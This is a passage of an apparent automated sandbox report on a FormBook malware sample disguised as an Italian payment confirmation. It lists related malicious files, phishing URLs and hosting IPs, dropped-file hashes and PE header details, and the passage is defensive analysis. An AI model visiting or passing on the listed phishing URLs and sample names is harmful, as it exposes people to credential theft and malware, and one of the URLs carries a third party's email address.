                                                        UuhANT$345432.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        kMXEkP04ZesB76R.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        Inquiry Purchase Order 25.03.2025.jsGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        Payment advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        www.sqlite.orgPayent confirmation copy 00888754087.scrGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        mind.ps1Get hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        Purchase Order Ref 68735.exeGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        Quotation.exeGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                        • 45.33.6.223
                                                        HZ1ZzlIpm7.vbeGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223
                                                        Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                        • 45.33.6.223
                                                        RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                        • 45.33.6.223

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSPRE-ALERT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.80.1
                                                        https://pdf30.sharefile.com/public/share/web-sfe1b4b3d3a3d460f8787ddfad4bb33aeGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                        • 104.19.229.21
                                                        #Ud83d#Udd0aAudio_Msg56 camsmgt.com.......xhtmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 172.67.74.152
                                                        https://littlestownseniorhighschool.webflow.io/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                        • 104.21.96.1
                                                        https://littlestownseniorhighschool.webflow.io/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                        • 104.21.95.206
                                                        45d3a72c-6a50-4a81-a3b9-ace908c38512.exeGet hashmaliciousSalat StealerBrowse
                                                        • 172.67.191.102
                                                        http://shaffersbbq.comGet hashmaliciousUnknownBrowse
                                                        • 104.18.86.42
                                                        https://g7ebgwhbb.cc.rs6.net/tn.jsp?f=001a2G7Ly_O8PBGwkSfYv8NWBx9T3OqJ7cdiNC9fZdX35x67ROlg6qK0rcSPYYxlYwdwbr5m-i-dZi2Tm_Q_MP6kBdHqytkQWt5yYJkSfUd_FOEepvtV1zhFSpSy91Jyv8KjghI8ZymKmiD4ciZZk5TmL5IiJPX3YYC&c=&ch=&__=#??ashley.hayes@brightflag.comGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                                        • 104.17.25.14
                                                        https://g7ebgwhbb.cc.rs6.net/tn.jsp?f=001a2G7Ly_O8PBGwkSfYv8NWBx9T3OqJ7cdiNC9fZdX35x67ROlg6qK0rcSPYYxlYwdwbr5m-i-dZi2Tm_Q_MP6kBdHqytkQWt5yYJkSfUd_FOEepvtV1zhFSpSy91Jyv8KjghI8ZymKmiD4ciZZk5TmL5IiJPX3YYC&c=&ch=&__=#??ashley.hayes@brightflag.comGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                                        • 104.21.11.44
                                                        http://ergonperizie.notion.site/1c3e29532f0a808e8960ccaa2fe479e5Get hashmaliciousHTMLPhisherBrowse
                                                        • 172.66.0.227
                                                        AMAZON-02USB_W_altvpn.exeGet hashmaliciousUnknownBrowse
                                                        • 18.238.55.66
                                                        https://pdf30.sharefile.com/public/share/web-sfe1b4b3d3a3d460f8787ddfad4bb33aeGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                        • 76.223.1.166
                                                        A_L-NP_speedshare_x64x86CLI.elfGet hashmaliciousUnknownBrowse
                                                        • 34.249.145.219
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 54.247.62.1
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 54.247.62.1
                                                        https://littlestownseniorhighschool.webflow.io/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                        • 13.33.251.210
                                                        https://littlestownseniorhighschool.webflow.io/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                        • 13.33.251.68
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 54.169.144.97
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                        • 54.169.144.97
                                                        https://phisher.knowbe4.com/inbox/?keywords=urls%3A%22https%3A%2F%2Fforms.monday.com%2Fforms%2F2c3e8e10604ffd4f61205460753ead11%3Fr%3Duse1%22Get hashmaliciousKnowBe4Browse
                                                        • 52.85.61.6
                                                        BODIS-NJUSPurchase order.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        FG_ShippingNotice_20250310_XDGF.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        PO_P0986880_03282025.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        QUOTATION#0072395.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        ur3RqLz9DB.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.160
                                                        adani quotation request.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        UuhANT$345432.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        kMXEkP04ZesB76R.exeGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        Inquiry Purchase Order 25.03.2025.jsGet hashmaliciousFormBookBrowse
                                                        • 199.59.243.228
                                                        LINODE-APLinodeLLCUSbimbo-m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 45.79.143.154
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                        • 176.58.114.141
                                                        vejfa5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 172.104.252.67
                                                        resgod.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 45.79.143.113
                                                        ur3RqLz9DB.exeGet hashmaliciousFormBookBrowse
                                                        • 45.56.79.23
                                                        givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • 198.58.118.167
                                                        http://hak5.comGet hashmaliciousUnknownBrowse
                                                        • 72.14.178.174
                                                        https://c3w6wx.webwave.dev/Get hashmaliciousUnknownBrowse
                                                        • 45.56.81.89
                                                        bettercontactforgreatworksgoodforbetter.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • 45.56.79.23
                                                        https://url.au.m.mimecastprotect.com/s/6K8YCK1Dn0inYwKuptAU5sVmz?domain=oneconnect.memberdoc.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 173.230.137.235

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\sqlite3.dllPurchase Order Ref 68735.exeGet hashmaliciousFormBookBrowse
                                                          KSACURFQAAB01.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                https://downloads.linktek.com/LR/SetupLinkReporter.zipGet hashmaliciousUnknownBrowse
                                                                  9jO1Dp6gDT.rtfGet hashmaliciousFormBookBrowse
                                                                    lrShdpqqbi.rtfGet hashmaliciousFormBookBrowse
                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                        BEM00263.docxGet hashmaliciousFormBookBrowse
                                                                          602_Shipping_instruction.xlsGet hashmaliciousFormBookBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3360000[1].zip

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\net1.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):555897
                                                                            Entropy (8bit):7.998798883269043
                                                                            Encrypted:true
                                                                            SSDEEP:12288:HrVIJYS55B72YeuYJxZk62xr4Tl0n5xAfy0hnTJW:x+55B7NqxZk62x8xIavh8
                                                                            MD5:A9A3B70ADCF65BE80C9B00E65D158669
                                                                            SHA1:F2149444F70B702A43AD1E058DEA147D6BA2EB5D
                                                                            SHA-256:BDCD90D909C708EFF9A829C01B428C2B24FAFC15F63DECCD064C2BB12B0A49E3
                                                                            SHA-512:E06EA8F9D982ECD5BEDF23676FA41B49D8673D9135F752655210C322529FB1441A4EF5F292825EEA11CCB0CB516E873C33D16C3F800204511639C5B8DB429290
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PK...........R...Vl...........sqlite3.defUT......`...`ux..................&...}.$=9}....v...F21...o;O.A`1.(].|#`.............Jz.2.u.....d....J.&<x3....4....a...........V.#g..M`.....a/L.y...[..W.f.F..I:o.u?...d.Vl..V6....P.o%389X..^.....j.....~.5......a|yp.M.8...9. ._=,./(..p.zV...z...........7..+...1..|....'.AAQ.J4<z...n...4$..;...w....e.....#..$....(9u....%.@Gr?.u.,....x._...B...8F....l...y......%Yo?..,(...?.p.`.`G....UJx<.j.a.......i.#.y8.m...2....@.Y4....g....m..;=x..T.j. .aO.f..U.;.Q......(.N/....|.....6.1w.v.0...c..!....m....L+..6...<.@^$....!..K....1/H..u...<.7....%.I63.v).v>..C.G....Q......CX...q.....H..)7:..... .'.....%.$.Q...`3.I0..PBE.Qa...*..X..0[.gk..nt.e.. ...p.9Y......[.&._..uK...i.h%......?8..53...\P1C.d...G..F1.7.<......i+x0.S.X...L..B'Zc..UT...~F...:c6...?..R......>(... .K..l...{.......p.{K...)[.........<d.H%GT.......F..C...Se...Rf..d....N...&..C..?.X@.v..ZJ.QS..=TJ..."1v^.B....'! .Y...b.V...q....8.c.Mv..G.0r.6w.xc..M.:..

                                                                            C:\Users\user\AppData\Local\Temp\1n61p-

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\net1.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                            Category:dropped
                                                                            Size (bytes):77824
                                                                            Entropy (8bit):1.133993246026424
                                                                            Encrypted:false
                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\aut28B6.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288256
                                                                            Entropy (8bit):7.9962825933585195
                                                                            Encrypted:true
                                                                            SSDEEP:6144:PnDXTSaAmr0pLT59Iie8YskHtpKShcDlnVefPilOGfk7hwMc6RW8D+R3Hg7:PDXTjolT5GzpskzzhcD7ixGfcW608Dx
                                                                            MD5:9DF5643A4903DF7187CE2C5375A5D4A4
                                                                            SHA1:718FFC96E1CBB4FE5F79CFB295DBBB46F28BCECE
                                                                            SHA-256:1ED47B563FEB39E57FE8A716F036D0EDC65B310A996C4E0663E5333FDF1E3CEF
                                                                            SHA-512:6835B34085927A61890A0FBDEF8B32B0ADB1B12273AD4EBA452C9A1671519BA4977363CCDC2EAE71722BDAE09E2B0F98BE3104E9F61592994F7BC780C6247699
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...P5E11VNYM.00.84ANN34.OK2EIZHWP6E11RNYM9W00384ANN34GOK2EI.HWP8Z.?R.P...1|..`)'=.D5 ,@$$z+6>X*E.0+y?L9.Y].p..n^[#*e?HC~HWP6E11+OP..7W..XS.s.T.]....)=.M....Q5.C..PT.f(-&.T .K2EIZHWPf.11.OXM.Y"k384ANN34.OI3NHQHW.2E11RNYM9W`%384QNN3DCOK2.IZXWP6G11TNYM9W00584ANN34G?O2EKZHWP6E31..YM)W0 384A^N3$GOK2EIJHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM.#UHG84Az.74G_K2E.^HW@6E11RNYM9W0038.AN.34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RN

                                                                            C:\Users\user\AppData\Local\Temp\cxex2xx0.zip

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\net1.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):555897
                                                                            Entropy (8bit):7.998798883269043
                                                                            Encrypted:true
                                                                            SSDEEP:12288:HrVIJYS55B72YeuYJxZk62xr4Tl0n5xAfy0hnTJW:x+55B7NqxZk62x8xIavh8
                                                                            MD5:A9A3B70ADCF65BE80C9B00E65D158669
                                                                            SHA1:F2149444F70B702A43AD1E058DEA147D6BA2EB5D
                                                                            SHA-256:BDCD90D909C708EFF9A829C01B428C2B24FAFC15F63DECCD064C2BB12B0A49E3
                                                                            SHA-512:E06EA8F9D982ECD5BEDF23676FA41B49D8673D9135F752655210C322529FB1441A4EF5F292825EEA11CCB0CB516E873C33D16C3F800204511639C5B8DB429290
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PK...........R...Vl...........sqlite3.defUT......`...`ux..................&...}.$=9}....v...F21...o;O.A`1.(].|#`.............Jz.2.u.....d....J.&<x3....4....a...........V.#g..M`.....a/L.y...[..W.f.F..I:o.u?...d.Vl..V6....P.o%389X..^.....j.....~.5......a|yp.M.8...9. ._=,./(..p.zV...z...........7..+...1..|....'.AAQ.J4<z...n...4$..;...w....e.....#..$....(9u....%.@Gr?.u.,....x._...B...8F....l...y......%Yo?..,(...?.p.`.`G....UJx<.j.a.......i.#.y8.m...2....@.Y4....g....m..;=x..T.j. .aO.f..U.;.Q......(.N/....|.....6.1w.v.0...c..!....m....L+..6...<.@^$....!..K....1/H..u...<.7....%.I63.v).v>..C.G....Q......CX...q.....H..)7:..... .'.....%.$.Q...`3.I0..PBE.Qa...*..X..0[.gk..nt.e.. ...p.9Y......[.&._..uK...i.h%......?8..53...\P1C.d...G..F1.7.<......i+x0.S.X...L..B'Zc..UT...~F...:c6...?..R......>(... .K..l...{.......p.{K...)[.........<d.H%GT.......F..C...Se...Rf..d....N...&..C..?.X@.v..ZJ.QS..=TJ..."1v^.B....'! .Y...b.V...q....8.c.Mv..G.0r.6w.xc..M.:..

                                                                            C:\Users\user\AppData\Local\Temp\isochronally

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288256
                                                                            Entropy (8bit):7.9962825933585195
                                                                            Encrypted:true
                                                                            SSDEEP:6144:PnDXTSaAmr0pLT59Iie8YskHtpKShcDlnVefPilOGfk7hwMc6RW8D+R3Hg7:PDXTjolT5GzpskzzhcD7ixGfcW608Dx
                                                                            MD5:9DF5643A4903DF7187CE2C5375A5D4A4
                                                                            SHA1:718FFC96E1CBB4FE5F79CFB295DBBB46F28BCECE
                                                                            SHA-256:1ED47B563FEB39E57FE8A716F036D0EDC65B310A996C4E0663E5333FDF1E3CEF
                                                                            SHA-512:6835B34085927A61890A0FBDEF8B32B0ADB1B12273AD4EBA452C9A1671519BA4977363CCDC2EAE71722BDAE09E2B0F98BE3104E9F61592994F7BC780C6247699
                                                                            Malicious:false
                                                                            Preview:...P5E11VNYM.00.84ANN34.OK2EIZHWP6E11RNYM9W00384ANN34GOK2EI.HWP8Z.?R.P...1|..`)'=.D5 ,@$$z+6>X*E.0+y?L9.Y].p..n^[#*e?HC~HWP6E11+OP..7W..XS.s.T.]....)=.M....Q5.C..PT.f(-&.T .K2EIZHWPf.11.OXM.Y"k384ANN34.OI3NHQHW.2E11RNYM9W`%384QNN3DCOK2.IZXWP6G11TNYM9W00584ANN34G?O2EKZHWP6E31..YM)W0 384A^N3$GOK2EIJHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM.#UHG84Az.74G_K2E.^HW@6E11RNYM9W0038.AN.34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RNYM9W00384ANN34GOK2EIZHWP6E11RN

                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\net1.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):7174
                                                                            Entropy (8bit):4.350979914765137
                                                                            Encrypted:false
                                                                            SSDEEP:96:GcuN/mwU+anR+7GgbqXdMcAM3K4tGvAF+GEhwIOVtvaENw+Y0aR:E/8+7GgbqbKWrF+GEebvaENw+cR
                                                                            MD5:88B78A6F643D3341AE9BF96D5816F1C2
                                                                            SHA1:66D8BB79C945396FFBEA9A272CA5BAEE0EEECF2A
                                                                            SHA-256:8CA12E8B973A1974E160AE2E55F2B59870314DF159BA2DC54C7349ACEE176EBE
                                                                            SHA-512:51166B6A0109BC003416BCD36EAB541B242EE9657CBA0876C6F5CBC62724E0C1BB1317317ED4121871380DE1B441D82A5954E0AEFE8DD532F2C46FF414E4D678
                                                                            Malicious:false
                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3changegroup_add.sqlite3changegroup_add_strm.sqlite3changegroup_delete.sqlite3changegroup_new.sqlite3changegroup_output.sqlite3changegroup_output_strm.sqlite3_changes.sqlite3changeset_apply.sqlite3changeset_apply_strm.sqlite3changeset_apply_v2.sqlite3changeset_apply_v2_strm

                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\net1.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1079909
                                                                            Entropy (8bit):6.4975516368338315
                                                                            Encrypted:false
                                                                            SSDEEP:24576:FRwXVREXm6CX7FgiX+y3sxroF/Ktlne05qj7:BmTXhznqroFYlno
                                                                            MD5:CE5C15B5092877974D5B6476AD1CB2D7
                                                                            SHA1:76A6FC307D1524081CBA1886D312DF97C9DD658F
                                                                            SHA-256:1F1A186EA26BD2462EA2A9CF35A816B92CAF0897FDF332AF3A61569E0BA97B24
                                                                            SHA-512:BB9CED38C63D2A29E18C38F60020CFDF0161384CD4AD6328352626643BECDF49F6B4BEF47012391720344FDD8AD520AA802DCBBED15B5026D27EB93B0A839C90
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: Purchase Order Ref 68735.exe, Detection: malicious, Browse
                                                                            • Filename: KSACURFQAAB01.xla.xlsx, Detection: malicious, Browse
                                                                            • Filename: Oct2024TU-580.xls, Detection: malicious, Browse
                                                                            • Filename: PO #86637.exe, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: 9jO1Dp6gDT.rtf, Detection: malicious, Browse
                                                                            • Filename: lrShdpqqbi.rtf, Detection: malicious, Browse
                                                                            • Filename: HSBC_Customer_Information.xls, Detection: malicious, Browse
                                                                            • Filename: BEM00263.docx, Detection: malicious, Browse
                                                                            • Filename: 602_Shipping_instruction.xls, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.2.........!...............................a.......................................... ......................p..T)......................................L:...................................................................................text...............................`.P`.data....#.......$..................@.`..rdata...=... ...>..................@.`@.bss....(....`........................`..edata..T)...p...*...>..............@.0@.idata...............h..............@.0..CRT....,............v..............@.0..tls.... ............x..............@.0..rsrc................z..............@.0..reloc..L:.......<..................@.0B/4......8.... ......................@.@B/19.....R....0......................@..B/31.....]'.......(..................@..B/45......-...0......................@..B/57.....\....`......................@.0B/70.....#....p..........

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.197482081970118
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:LETTERA DI CONFERMA DEL PAGAMENTO.exe
                                                                            File size:1'170'944 bytes
                                                                            MD5:a5550246c73f30ed5fd68bb236675d46
                                                                            SHA1:38eb7760ece55dcdd8943376da40f446bc9469d4
                                                                            SHA256:60727aaf2a23d1760c52945ee9b3fa1b39f155ff6ebf98b38a170fba58a6fdde
                                                                            SHA512:a9e225874a6b5751ed5ee84bf74e855a23e8e2b7bdfb6147b6c7e7392d3170ee29e5ed020b6a4b2d920102d0d98d0d582ba4e37e638f62dba68c90f8c3929e30
                                                                            SSDEEP:24576:gu6J33O0c+JY5UZ+XC0kGso6FajzgX1lzJSb2jkJ8mwsBkQWY:Ku0c++OCvkGs9Faj4UMknwOSY
                                                                            TLSH:6945CF22B3DDC360CB669173BF69B3016EBF7C664630B85B2F880D79A950171162D7A3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                            File Icon

                                                                            Icon Hash:65c595a58d998089

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x427dcd
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x67E688F1 [Fri Mar 28 11:33:05 2025 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                            Instruction
                                                                            call 00007F9CE47D0DCAh
                                                                            jmp 00007F9CE47C3B94h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F9CE47C3D1Ah
                                                                            cmp edi, eax
                                                                            jc 00007F9CE47C407Eh
                                                                            bt dword ptr [004C31FCh], 01h
                                                                            jnc 00007F9CE47C3D19h
                                                                            rep movsb
                                                                            jmp 00007F9CE47C402Ch
                                                                            cmp ecx, 00000080h
                                                                            jc 00007F9CE47C3EE4h
                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007F9CE47C3D20h
                                                                            bt dword ptr [004BE324h], 01h
                                                                            jc 00007F9CE47C41F0h
                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                            jnc 00007F9CE47C3EBDh
                                                                            test edi, 00000003h
                                                                            jne 00007F9CE47C3ECEh
                                                                            test esi, 00000003h
                                                                            jne 00007F9CE47C3EADh
                                                                            bt edi, 02h
                                                                            jnc 00007F9CE47C3D1Fh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007F9CE47C3D23h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007F9CE47C3D75h
                                                                            bt esi, 03h
                                                                            jnc 00007F9CE47C3DC8h
                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x554b8.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x711c.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
